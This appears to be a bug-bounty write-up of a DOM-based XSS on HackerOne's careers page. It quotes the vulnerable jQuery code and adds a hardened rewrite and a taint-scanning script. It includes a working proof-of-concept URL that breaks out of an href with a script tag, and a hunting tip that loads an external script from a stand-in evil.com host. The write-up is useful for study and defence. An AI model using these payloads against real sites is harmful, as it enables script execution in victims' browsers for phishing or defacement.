Overview

Security researcher Nguyenlv7 discovered a DOM-based XSS vulnerability on HackerOne's careers page, leading to a $500 bounty reward. The issue resided in the way the page handled the ?lever- parameter in the URL: its value was read from the current location and appended into the DOM without proper sanitization.

While this attack couldn't bypass the Content Security Policy (CSP) on modern browsers like Chrome and Firefox, it still executed successfully on Internet Explorer and Microsoft Edge, where URL parsing behaved differently.

Vulnerability Breakdown

Vulnerable Endpoint:

https://www.hackerone.com/careers?lever-<payload>

Vulnerable Code (Masonry JS file):

// Source: the full URL, fragment included, is read from the browser.
var pageUrl = window.location.href;
var leverParameter = '';
var trackingPrefix = '?lever-';

// Everything after "?lever-" is copied verbatim, with no validation.
if( pageUrl.indexOf(trackingPrefix) >= 0){
  var pageUrlSplit = pageUrl.split(trackingPrefix);
  leverParameter = '?lever-' + pageUrlSplit[1];
}

var link = posting.hostedUrl + leverParameter;

// Sink: the tainted link is concatenated into an HTML string and appended to the DOM.
jQuery('#jobs-container .jobs-list').append(
  '<div class="job ' + teamCleanString + ' ' + locationCleanString.replace(',', '') + ' ' + commitmentCleanString + '">' +
    '<a class="job-title" href="' + link + '">' + title + '</a>' +
    '<p class="tags"><span>' + team + '</span><span>' + location + '</span><span>' + commitment + '</span></p>' +
    '<p class="description">' + shortDescription + '</p>' +
    '<a class="btn" href="' + link + '">Learn more</a>' +
  '</div>'
);

Here the link variable, which contains unvalidated user input taken from the URL, is concatenated into an HTML string and inserted directly into the DOM. Because the href attribute is built by string concatenation, a value containing a double quote closes the attribute and anything after it is parsed as markup, which is what makes a DOM-based XSS possible via the ?lever- parameter.
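To make the fix concrete, here is an added example (not code from the page or from HackerOne's careers bundle) that places the page's extraction logic beside a hardened version. The hardened version parses the URL with the standard URL API, ignores the fragment (which the browser never sends to the server, so server-side filtering or logging never sees it), applies an allowlist to the decoded token, and refuses non-https posting URLs in the href. The token shape in LEVER_TOKEN, the posting.title field and the jobs.example.com host are assumptions, not values from the report.

```javascript
// Added example, not code from the page or from HackerOne's careers bundle.

// Vulnerable pattern as the page describes it, kept for comparison: everything
// after "?lever-" in the full href (fragment included) is copied into the link.
function extractLeverUnsafe(pageUrl) {
  const trackingPrefix = '?lever-';
  if (pageUrl.indexOf(trackingPrefix) < 0) return '';
  return '?lever-' + pageUrl.split(trackingPrefix)[1];
}

// Assumed shape of a legitimate tracking token; adjust to the real scheme.
const LEVER_TOKEN = /^[A-Za-z0-9_-]{1,64}$/;

// Hardened extraction: URL API, query string only, allowlist on the decoded value.
function extractLeverSafe(pageUrl) {
  let url;
  try {
    url = new URL(pageUrl);
  } catch (e) {
    return ''; // not a parseable URL, so no tracking suffix
  }
  // The page's format is "?lever-<token>" with no "=", so the token is a
  // parameter *name*. searchParams covers the query only, never the fragment,
  // and it percent-decodes, so the allowlist sees the decoded value.
  for (const key of url.searchParams.keys()) {
    if (!key.startsWith('lever-')) continue;
    const token = key.slice('lever-'.length);
    return LEVER_TOKEN.test(token) ? '?lever-' + encodeURIComponent(token) : '';
  }
  return '';
}

// Builds the posting link. hostedUrl comes from the postings feed, so it is
// validated as well: only https URLs may end up in an href.
function buildJobLink(posting, pageUrl) {
  let base;
  try {
    base = new URL(posting.hostedUrl);
  } catch (e) {
    return '';
  }
  if (base.protocol !== 'https:') return '';
  return base.href + extractLeverSafe(pageUrl);
}

// Rendering without HTML string concatenation (browser only, not exercised in
// Node). Values go through setAttribute and textContent, so characters such as
// " or < in the data cannot break out of the attribute or element context.
// posting.title is an assumed field name.
function renderJobCard(doc, container, posting, link) {
  const card = doc.createElement('div');
  card.className = 'job';
  const anchor = doc.createElement('a');
  anchor.className = 'job-title';
  anchor.setAttribute('href', link);
  anchor.textContent = posting.title;
  card.appendChild(anchor);
  container.appendChild(card);
  return card;
}

// Constructed inputs: a fragment-based breakout attempt versus a normal token.
const CONSTRUCTED_EVIL = 'https://www.hackerone.com/careers?lever-#aaa"><b>x</b>';
const CONSTRUCTED_OK = 'https://www.hackerone.com/careers?lever-src_01';
console.log('unsafe:', extractLeverUnsafe(CONSTRUCTED_EVIL)); // markup passes through
console.log('safe:  ', JSON.stringify(extractLeverSafe(CONSTRUCTED_EVIL))); // ""
console.log('link:  ', buildJobLink({ hostedUrl: 'https://jobs.example.com/posting/123' }, CONSTRUCTED_OK));
```

The allowlist is applied after decoding and independently of how a given browser serialises location.href, so the check does not rely on modern browsers percent-encoding characters in the fragment; it holds on legacy engines as well. Run it with node to see the unsafe extraction carry the markup through while the safe one drops it.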

Proof of Concept (PoC)

https://www.hackerone.com/careers?lever-#aaa"><script src="https://app-sj17.marketo.com/index.php/form/getForm?callback=alert"></script>

On IE/Edge this payload caused the injected script to execute, leading to a reflected XSS.

Impact

  • JavaScript code execution in the context of the careers page domain
  • While CSP blocked the attack in modern browsers, older or weaker environments (like IE/Edge) were still vulnerable
  • An attacker could use this vector for phishing or defacement

How You Can Find This Vulnerability

If you're hunting for similar bugs, follow these steps:

1. Look for Dynamic URL Parsing

  • Search JavaScript files for window.location.href, window.location.search, or custom parsing of query strings.

2. Spot Untrusted Input Used in DOM Sinks

  • Check whether variables derived from the URL are inserted into HTML with .innerHTML, jQuery().append(), or similar methods.

3. Inspect CSP

  • Try payloads in various browsers. If CSP blocks the attack, test in browsers like IE or in test environments without strict CSP headers.

4. Create XSS Payloads with External Scripts

  Example:

  <script src="https://evil.com/evil.js"></script>

5. Always Test Edge-Case Browsers

  • Modern CSP might save you, but legacy browsers or embedded contexts may still allow the payload to run.
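Steps 1 and 2 above are a grep exercise over a site's JavaScript bundles. The following added example (not a tool from the page or from HackerOne) automates that triage: it finds lines that read the URL, follows plain assignments to build a set of tainted variable names, and flags HTML-writing sinks whose arguments mention one of them. It is a heuristic aid for code review, not a real taint analysis: it does not follow function calls, object properties or string-concatenated sinks that span lines without parentheses. The SAMPLE input is a constructed reduction of the page's snippet.

```javascript
// Added example, not code from the page or from HackerOne's Masonry bundle.

// Reads of the current URL (sources) and HTML-writing APIs (sinks).
const SOURCE_RE = /\b(?:window\.|document\.)?location\.(?:href|search|hash)\b|\bdocument\.URL\b/;
const SINK_RE = /\.(?:innerHTML|outerHTML)\s*=(?!=)|\.(?:append|prepend|html|after|before|replaceWith)\s*\(|\bdocument\.write\s*\(/;
// Simple assignment to a bare identifier: "var x = ..." or "x = ..." (not "==").
const ASSIGN_RE = /^\s*(?:var|let|const)?\s*([A-Za-z_$][\w$]*)\s*=(?!=)\s*(.+)$/;
const IDENT_RE = /[A-Za-z_$][\w$]*/g;

// "(" minus ")" on a line, ignoring parentheses inside string literals.
function parenBalance(line) {
  const code = line.replace(/'(?:\\.|[^'\\])*'|"(?:\\.|[^"\\])*"/g, '""');
  return (code.match(/\(/g) || []).length - (code.match(/\)/g) || []).length;
}

// Distinct identifiers in text that are in the tainted set.
function taintedIdents(text, tainted) {
  const ids = text.match(IDENT_RE) || [];
  return [...new Set(ids.filter((id) => tainted.has(id)))];
}

function scanForDomXss(source) {
  const tainted = new Set();
  const findings = [];
  let open = null; // a sink call whose argument list has not closed yet

  const closeSink = () => {
    const vars = taintedIdents(open.text, tainted);
    const direct = SOURCE_RE.test(open.text);
    if (vars.length || direct) {
      findings.push({ line: open.line, kind: 'sink', vars, directSource: direct });
    }
    open = null;
  };

  source.split('\n').forEach((line, idx) => {
    const no = idx + 1;
    if (open) {
      // Still inside a multi-line sink call: accumulate until the parens balance.
      open.text += '\n' + line;
      open.depth += parenBalance(line);
      if (open.depth <= 0) closeSink();
      return;
    }
    const m = line.match(ASSIGN_RE);
    if (m) {
      const [, name, rhs] = m;
      if (SOURCE_RE.test(rhs) || taintedIdents(rhs, tainted).length) {
        tainted.add(name);
        findings.push({ line: no, kind: 'source', name });
      }
    }
    if (SINK_RE.test(line)) {
      open = { line: no, depth: parenBalance(line), text: line };
      if (open.depth <= 0) closeSink();
    }
  });

  return { tainted: Array.from(tainted), findings };
}

// Constructed sample: a reduced form of the page's vulnerable snippet, plus a
// safe textContent write at the end that should not be reported.
const SAMPLE = `var pageUrl = window.location.href;
var leverParameter = '';
var trackingPrefix = '?lever-';
if (pageUrl.indexOf(trackingPrefix) >= 0) {
  var pageUrlSplit = pageUrl.split(trackingPrefix);
  leverParameter = '?lever-' + pageUrlSplit[1];
}
var link = posting.hostedUrl + leverParameter;
jQuery('#jobs-container .jobs-list').append(
  '<a class="job-title" href="' + link + '">' + title + '</a>' +
  '<p class="description">' + shortDescription + '</p>'
);
var safe = document.getElementById('x');
safe.textContent = link;`;

for (const f of scanForDomXss(SAMPLE).findings) {
  console.log(`line ${f.line}: ${f.kind}`, f.kind === 'source' ? f.name : f.vars);
}
```

On the sample this reports the taint chain pageUrl, pageUrlSplit, leverParameter, link and a single sink at the jQuery .append( call; the textContent write is correctly left alone. Point it at the unminified bundles of your own site and review each sink finding by hand.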

Bounty Info

  • Hunter: nguyenlv7
  • Bounty Awarded: $500
  • Report ID: #474656

Final Thoughts

This report is a good example of why legacy browser testing and DOM input validation are still relevant in 2025. Even if modern defenses catch an injection, attackers often target outdated environments where those protections don't exist.

Bug bounty programs like HackerOne's continue to reward impactful findings even when exploitation is limited, proving that good analysis and responsible reporting go a long way.

Thanks for reading! ✨🤑

Happy hunting, and remember: always check the DOM.